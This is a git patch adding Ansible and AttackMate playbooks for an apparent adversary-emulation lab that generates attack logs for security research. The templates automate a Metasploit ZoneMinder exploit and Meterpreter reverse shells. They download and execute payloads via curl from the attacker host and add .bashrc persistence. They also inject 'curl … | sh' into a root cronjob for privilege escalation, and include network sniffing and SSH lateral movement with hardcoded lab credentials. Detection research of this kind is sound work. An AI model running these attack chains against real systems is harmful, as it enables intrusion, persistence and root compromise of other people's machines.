From fdfa6deee579ec89e0f491b50504f840ba841f92 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 25 Nov 2025 15:07:51 +0100 Subject: [PATCH 1/2] update .gitignore --- ansible/.gitignore | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ansible/.gitignore b/ansible/.gitignore index 3cbfc7f9..8bfbe2c7 100644 --- a/ansible/.gitignore +++ b/ansible/.gitignore @@ -3,3 +3,5 @@ roles/* !roles/.gitkeep collections/* !collections/.gitkeep% +*tar.gz + From a9ee413057e85deaff637d9a8847950d3230992a Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 25 Nov 2025 15:09:37 +0100 Subject: [PATCH 2/2] move caldera files to deploy folder --- ansible/deploy/caldera/gather.yml | 52 +++++ ansible/deploy/caldera/main.yml | 123 ++++++++++++ .../caldera/templates/lateral_movement.j2 | 81 ++++++++ ansible/deploy/caldera/templates/playbook.j2 | 141 ++++++++++++++ ...aybook_interactive_shell_in_msf_session.j2 | 183 ++++++++++++++++++ .../templates/priviledge_escalation.j2 | 119 ++++++++++++ ansible/deploy/caldera/templates/tcpdump.j2 | 46 +++++ ansible/deploy/caldera/templates/upgrade.j2 | 49 +++++ 8 files changed, 794 insertions(+) create mode 100644 ansible/deploy/caldera/gather.yml create mode 100644 ansible/deploy/caldera/main.yml create mode 100644 ansible/deploy/caldera/templates/lateral_movement.j2 create mode 100644 ansible/deploy/caldera/templates/playbook.j2 create mode 100644 ansible/deploy/caldera/templates/playbook_interactive_shell_in_msf_session.j2 create mode 100644 ansible/deploy/caldera/templates/priviledge_escalation.j2 create mode 100644 ansible/deploy/caldera/templates/tcpdump.j2 create mode 100644 ansible/deploy/caldera/templates/upgrade.j2 diff --git a/ansible/deploy/caldera/gather.yml b/ansible/deploy/caldera/gather.yml new file mode 100644 index 00000000..413c845e --- /dev/null +++ b/ansible/deploy/caldera/gather.yml @@ -0,0 +1,52 @@ +- hosts: attacker + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + # - /home/aecid/attackmate.log + # - /home/aecid/output.log + # - /home/aecid/attackmate.json + # - /home/aecid/Downloads/tcpdump_with_timeout_report.json + # - /home/aecid/Downloads/priviledge_escalation_report.json + - /home/aecid/Downloads/root_report.json + # - /home/aecid/Downloads/priv_esc_as_www_data_report.json + - /home/aecid/Downloads/become_www-data_sed_for_priv_esc_report.json + # - /home/aecid/Downloads/tcpdump_with_timeout_report.json + # - /home/aecid/Downloads/lateral_movement_scp_report.json + # - /home/aecid/Downloads/moved_scp_report.json + # - /home/aecid/Downloads/lateral_movement_ssh_two_commands_report.json + + + - src: /var/log + recursive: true + + kyoushi_gather_configs: + # - src: /home/aecid/lateral_movement.yml + - src: /var/www/html + recursive: true + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + + +- hosts: target, target2 + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_configs: + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + + kyoushi_gather_logs: + - src: /var/log + recursive: true + + + diff --git a/ansible/deploy/caldera/main.yml b/ansible/deploy/caldera/main.yml new file mode 100644 index 00000000..d9b3083b --- /dev/null +++ b/ansible/deploy/caldera/main.yml @@ -0,0 +1,123 @@ +- name: Retstart dnsmasq on inetdns + hosts: inetdns + become: true + tasks: + - name: stop dnsmasq + ansible.builtin.service: + name: dnsmasq + state: stopped + tags: + - playbooks + + - name: start dnsmasq + ansible.builtin.service: + name: dnsmasq + state: started + tags: + - playbooks + +- name: Prepare target + hosts: target + become: true + tasks: + - name: Ensure 127.0.0.1 is present in /etc/hosts + ansible.builtin.lineinfile: + path: "/etc/hosts" + line: "127.0.0.1\ttarget" + state: present + - name: audit d rules + ansible.builtin.lineinfile: + path: "/etc/audit/rules.d/audit.rules" + line: "-a always,exit -S all -F euid=0 -F perm=x -F key=HACKER_ACTION" + state: present + notify: Restart auditd service + handlers: + - name: Restart auditd service + ansible.builtin.service: + name: auditd + state: restarted + +- name: Prepare target2 + hosts: target2 + become: true + tasks: + - name: Ensure 127.0.0.1 is present in /etc/hosts + ansible.builtin.lineinfile: + path: "/etc/hosts" + line: "127.0.0.1\ttarget2" + state: present + - name: audit d rules + ansible.builtin.lineinfile: + path: "/etc/audit/rules.d/audit.rules" + line: "-a always,exit -S all -F euid=0 -F perm=x -F key=HACKER_ACTION" + state: present + notify: Restart auditd service + handlers: + - name: Restart auditd service + ansible.builtin.service: + name: auditd + state: restarted + +# - name: Install Attacker Host +# hosts: attacker +# become: true +# vars: +# attacker_user: aecid +# attacker_ip: 192.42.1.174 +# delay_before_attack: 300 +# tasks: +# - name: Ensure 127.0.0.1 is present in /etc/hosts +# ansible.builtin.lineinfile: +# path: "/etc/hosts" +# line: "127.0.0.1\tattacker" +# state: present +# - name: get user home directory +# ansible.builtin.shell: > +# getent passwd {{ attacker_user }} | awk -F: '{ print $6 }' +# changed_when: false +# register: user_home +# tags: +# - playbooks + + # - name: Create file for privilegde escalation + # ansible.builtin.shell: + # cmd: msfvenom -p cmd/unix/python/meterpreter/reverse_tcp LHOST=192.42.1.174 --platform x64 > /var/www/html/TODO.md + # creates: /var/www/html/TODO.md + + # - name: Ensure delay before commands + # ansible.builtin.replace: + # path: /etc/attackmate.yml + # regexp: 'command_delay: 0' + # replace: 'command_delay: 15' + # backup: yes + # become: true + # tags: + # - playbooks + + + # - name: Copy playbooks + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.template: + # src: "{{ item }}.j2" + # dest: "{{user_home.stdout}}/{{ item }}.yml" + # mode: '0755' + # loop: + # # - priviledge_escalation + # # - tcpdump + # - lateral_movement + # tags: + + # - playbooks + + # - name: "Run Caldera Playbook" + # become: True + # become_user: "{{attacker_user}}" + # ansible.builtin.shell: + # cmd: "sleep {{delay_before_attack}} && /usr/local/bin/attackmate-tmux lateral_movement.yml --json" + # chdir: "{{user_home.stdout}}" + # tags: + # - caldera + # - metasploit + # - attackmate + # - exploit diff --git a/ansible/deploy/caldera/templates/lateral_movement.j2 b/ansible/deploy/caldera/templates/lateral_movement.j2 new file mode 100644 index 00000000..38942cc0 --- /dev/null +++ b/ansible/deploy/caldera/templates/lateral_movement.j2 @@ -0,0 +1,81 @@ +#################### +# +# Caldera lateral movement +# +#################### +vars: + $ATTACKER_ADDRESS: 192.42.1.174 + $TARGET_ADDRESS: 192.42.1.175 + $TARGET2_ADDRESS: 192.42.1.176 + + $LINUX_USER: aecid + $LINUX_USER_PASSWORD: aecid + + $TARGET2_USER: judy + $TARGET2_USER_PASSWORD: garland + +commands: + +#login with a valid account + - type: ssh + creates_session: foothold + username: $LINUX_USER + key_filename: "/home/aecid/.ssh/key" + hostname: $TARGET_ADDRESS + cmd: id + metadata: + techniques: "T1078.002" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts" + + - type: sleep + seconds: 30 + +# login with ssh username and password on second target + + - type: ssh + session: foothold + cmd: "ssh -o StrictHostKeyChecking=no -o PreferredAuthentications=password judy@192.42.1.176\n" + interactive: True + metadata: + techniques: "T1078.003" + tactics: "Lateral Movement" + technique_name: "Valid Accounts: Local Accounts" + + - type: sleep + seconds: 5 + + - type: ssh + session: foothold + cmd: "garland\n" + interactive: True + metadata: + techniques: "T1078.003" + tactics: "Lateral Movement" + technique_name: "Valid Accounts: Local Accounts" + + - type: sleep + seconds: 5 + + - type: ssh + session: foothold + cmd: "id\n" + interactive: True + metadata: + techniques: "T1087.001" + tactics: "Discovery" + technique_name: "Account Discovery: Local Account" + + - type: sleep + seconds: 5 + + - type: ssh + session: foothold + cmd: "whoami\n" + interactive: True + metadata: + techniques: "T1087.001" + tactics: "Discovery" + technique_name: "Account Discovery: Local Account" + + diff --git a/ansible/deploy/caldera/templates/playbook.j2 b/ansible/deploy/caldera/templates/playbook.j2 new file mode 100644 index 00000000..a50e12ca --- /dev/null +++ b/ansible/deploy/caldera/templates/playbook.j2 @@ -0,0 +1,141 @@ +#################### +# +# Caldera +# +#################### +vars: + $TARGET_ADDRESS: 192.42.1.175 + $ATTACKER_ADDRESS: 192.42.1.174 + $LINUX_USER: aecid + $LINUX_USER_PASSWORD: aecid + +commands: +#prepare the meterpreter payload/session + - type: mktemp + cmd: file + variable: RSHELL + + - type: msf-payload + cmd: cmd/unix/python/meterpreter/reverse_tcp + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + local_path: $RSHELL + + - type: msf-module + creates_session: meterpreter + cmd: exploit/multi/handler + payload: "cmd/unix/python/meterpreter/reverse_tcp" + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + background: true + kill_on_exit: true + + - type: webserv + local_path: $RSHELL + port: 8888 + background: True + kill_on_exit: true + + +#login with a valid account + - type: ssh + creates_session: foothold + username: $LINUX_USER + key_filename: "/home/aecid/.ssh/key" + hostname: $TARGET_ADDRESS + cmd: id + metadata: + techniques: "T1078.002" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts" + +#download the meterpreter payload and execute it + - type: ssh + session: foothold + cmd: "curl http://$ATTACKER_ADDRESS:8888/install.sh -o /home/$LINUX_USER/install.sh\n" + interactive: True + + - type: ssh + session: foothold + cmd: "chmod +x /home/$LINUX_USER/install.sh\n" + interactive: True + + - type: ssh + session: foothold + cmd: "./install.sh\n" + interactive: True + + - type: sleep + seconds: 5 + + - type: ssh + session: foothold + cmd: "sudo tcpdump host 192.42.1.174 and port 8888 -A\n" + interactive: True + metadata: + techniques: "T1040" + tactics: "Credential Access" + technique_name: "Network Sniffing" + + - type: sleep + seconds: 10 + +#stop process by sending ctrl-c + - type: ssh + session: foothold + cmd: "03" + interactive: True + bin: True + +# Persistence + - type: ssh + cmd: "vim /home/$LINUX_USER/.bashrc\n" + session: foothold + interactive: True + + - type: ssh + cmd: ":inoremap jj \n" + session: foothold + interactive: True + + - type: ssh + cmd: "/# for examples\n" + session: foothold + interactive: True + + - type: ssh + cmd: "o" + session: foothold + interactive: True + + - type: ssh + cmd: "./install.sh &" + session: foothold + interactive: True + metadata: + techniques: "T1547" + tactics: "Persistence, Privilege Escalation" + technique_name: "Boot or Logon Autostart Execution" + + - type: ssh + cmd: "jj" + session: foothold + interactive: True + + - type: ssh + cmd: ":wq!\n" + session: foothold + interactive: True + + - type: msf-session + session: meterpreter + cmd: sysinfo + +# upgrade the session + - type: msf-session + cmd: shell + session: foothold + + diff --git a/ansible/deploy/caldera/templates/playbook_interactive_shell_in_msf_session.j2 b/ansible/deploy/caldera/templates/playbook_interactive_shell_in_msf_session.j2 new file mode 100644 index 00000000..aaf8b450 --- /dev/null +++ b/ansible/deploy/caldera/templates/playbook_interactive_shell_in_msf_session.j2 @@ -0,0 +1,183 @@ +#################### +# +# Priviledge Escalation +# +#################### +vars: + $TARGET_ADDRESS: 192.42.1.175 + $ATTACKER_ADDRESS: 192.42.1.174 + $LINUX_USER: aecid + $LINUX_USER_PASSWORD: aecid + +commands: +#prepare the meterpreter payload/session + - type: mktemp + cmd: file + variable: RSHELL + + - type: msf-payload + cmd: cmd/unix/python/meterpreter/reverse_tcp + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + local_path: $RSHELL + + - type: msf-module + creates_session: meterpreter + cmd: exploit/multi/handler + payload: "cmd/unix/python/meterpreter/reverse_tcp" + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + background: true + kill_on_exit: true + + - type: webserv + local_path: $RSHELL + port: 8888 + background: True + kill_on_exit: true + + +#login with a valid account + - type: ssh + creates_session: foothold + username: $LINUX_USER + key_filename: "/home/aecid/.ssh/key" + hostname: $TARGET_ADDRESS + cmd: id + metadata: + techniques: "T1078.002" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts" + +#download the meterpreter payload and execute it + - type: ssh + session: foothold + cmd: "curl http://$ATTACKER_ADDRESS:8888/install.sh -o /home/$LINUX_USER/install.sh\n" + interactive: True + + - type: ssh + session: foothold + cmd: "chmod +x /home/$LINUX_USER/install.sh\n" + interactive: True + + - type: ssh + session: foothold + cmd: "./install.sh\n" + interactive: True + + - type: sleep + seconds: 5 + + - type: ssh + session: foothold + cmd: "sudo tcpdump host 192.42.1.174 and port 8888 -A\n" + interactive: True + metadata: + techniques: "T1040" + tactics: "Credential Access" + technique_name: "Network Sniffing" + + - type: sleep + seconds: 10 + +#stop process by sending ctrl-c + - type: ssh + session: foothold + cmd: "03" + interactive: True + bin: True + + - type: msf-session + session: meterpreter + cmd: sysinfo + +# upgrade the session + - type: msf-session + cmd: shell + session: "meterpreter" + + - type: msf-session + cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")"; + session: "meterpreter" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: export SHELL=bash + session: "meterpreter" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: export TERM=xterm256-color + session: "meterpreter" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: stty rows 38 columns 116 + session: "meterpreter" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + +## is this needed? + - type: msf-session + cmd: 'export PS1="PWN >"' + session: "meterpreter" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + +# Persistence + - type: msf-session + cmd: vim /home/$LINUX_USER/.bashrc + session: "meterpreter" + + - type: msf-session + cmd: ":inoremap jj " + session: "meterpreter" + + - type: msf-session + cmd: "/# for examples" + session: "meterpreter" + + - type: msf-session + cmd: "o" + session: "meterpreter" + + - type: msf-session + cmd: "./install.sh &" + session: "meterpreter" + metadata: + techniques: "T1547" + tactics: "Persistence, Privilege Escalation" + technique_name: "Boot or Logon Autostart Execution" + + - type: msf-session + cmd: "jj" + session: "meterpreter" + + - type: msf-session + cmd: ":wq!\n" + session: "meterpreter" + + - type: msf-session + cmd: "exit" + session: "meterpreter" + + - type: ssh + session: foothold + cmd: "exit\n" + interactive: True + diff --git a/ansible/deploy/caldera/templates/priviledge_escalation.j2 b/ansible/deploy/caldera/templates/priviledge_escalation.j2 new file mode 100644 index 00000000..628c8553 --- /dev/null +++ b/ansible/deploy/caldera/templates/priviledge_escalation.j2 @@ -0,0 +1,119 @@ +#################### +# +# Priviledge escalation (like Scenario 1 e a) +# +#################### +vars: + $SERVER_ADDRESS: video.attackbed.com + $ATTACKER_ADDRESS: 192.42.1.174 + $TARGET_ADDRESS: 192.42.1.175 + $DOMAIN: attackbed.com + $USER: aecid + +commands: + +#### use zoneminder exploit to gain foothold #### + + - type: msf-module + cmd: exploit/unix/webapp/zoneminder_snapshots + creates_session: "foothold" + options: + RHOSTS: $TARGET_ADDRESS + payload_options: + LHOST: 192.42.1.174 + payload: cmd/unix/python/meterpreter/reverse_tcp + metadata: + techniques: "T1190,T1059.006" + tactics: "Initial Access" + technique_name: "Exploit Public-Facing Application,Command and Scripting Interpreter: Python" + + - type: msf-session + cmd: shell + session: "foothold" + + - type: msf-session + cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")"; + session: "foothold" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: export SHELL=bash + session: "foothold" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: export TERM=xterm256-color + session: "foothold" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + + - type: msf-session + cmd: stty rows 38 columns 116 + session: "foothold" + metadata: + techniques: "T1059" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter" + +##### modify misconfigured cronjob to get reverse shell with root access #### + + - type: msf-session + cmd: vim /usr/share/awffull/awffull + session: "foothold" + + - type: msf-session + cmd: ":inoremap jj " + session: "foothold" + + - type: msf-session + cmd: "o" + session: "foothold" + + - type: msf-session + cmd: "curl http://$ATTACKER_ADDRESS/TODO.md | sh" + session: "foothold" + metadata: + techniques: "T1053" + tactics: "Execution,Persistence,Privilege Escalation" + + - type: msf-session + cmd: "jj" + session: "foothold" + + - type: msf-session + cmd: ":wq!\n" + session: "foothold" + metadata: + techniques: "T1053" + tactics: "Execution,Persistence,Privilege Escalation" + +##### msf-session as root #### + + - type: msf-module + cmd: exploit/multi/handler + creates_session: "root" + payload_options: + LHOST: 192.42.1.174 + payload: cmd/unix/python/meterpreter/reverse_tcp + + - type: msf-session + stdapi: True + cmd: "getuid" + session: "root" + + - type: msf-session + session: "root" + cmd: cat /etc/passwd + metadata: + techniques: "T1087.001" + tactics: "Discovery" + technique_name: "Account Discovery: Local Account" + diff --git a/ansible/deploy/caldera/templates/tcpdump.j2 b/ansible/deploy/caldera/templates/tcpdump.j2 new file mode 100644 index 00000000..bb7a6a6d --- /dev/null +++ b/ansible/deploy/caldera/templates/tcpdump.j2 @@ -0,0 +1,46 @@ +#################### +# +# Caldera tcpdump +# +#################### +vars: + $TARGET_ADDRESS: 192.42.1.175 + $ATTACKER_ADDRESS: 192.42.1.174 + $LINUX_USER: aecid + $LINUX_USER_PASSWORD: aecid + +commands: + +#login with a valid account + - type: ssh + creates_session: foothold + username: $LINUX_USER + key_filename: "/home/aecid/.ssh/key" + hostname: $TARGET_ADDRESS + cmd: id + metadata: + techniques: "T1078.002" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts" + +# execute and stop tcpdump + - type: ssh + session: foothold + cmd: "sudo tcpdump \n" + interactive: True + metadata: + techniques: "T1040" + tactics: "Credential Access" + technique_name: "Network Sniffing" + + - type: sleep + seconds: 10 + +#stop process by sending ctrl-c + - type: ssh + session: foothold + cmd: "03" + interactive: True + bin: True + + diff --git a/ansible/deploy/caldera/templates/upgrade.j2 b/ansible/deploy/caldera/templates/upgrade.j2 new file mode 100644 index 00000000..06e9b26d --- /dev/null +++ b/ansible/deploy/caldera/templates/upgrade.j2 @@ -0,0 +1,49 @@ +commands: + - type: msf-session + cmd: shell + session: $UPGRADESESSION + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" + + - type: msf-session + cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")"; + session: $UPGRADESESSION + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" + + - type: msf-session + cmd: export SHELL=bash + session: $UPGRADESESSION + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" + + - type: msf-session + cmd: export TERM=xterm256-color + session: $UPGRADESESSION + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" + + - type: msf-session + cmd: stty rows 38 columns 116 + session: $UPGRADESESSION + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" + + # needed for xclip and wmctrl + - type: msf-session + cmd: export DISPLAY=:0 + session: revshell + metadata: + techniques: "T1059.004" + tactics: "Execution" + technique_name: "Command and Scripting Interpreter: Unix Shell" \ No newline at end of file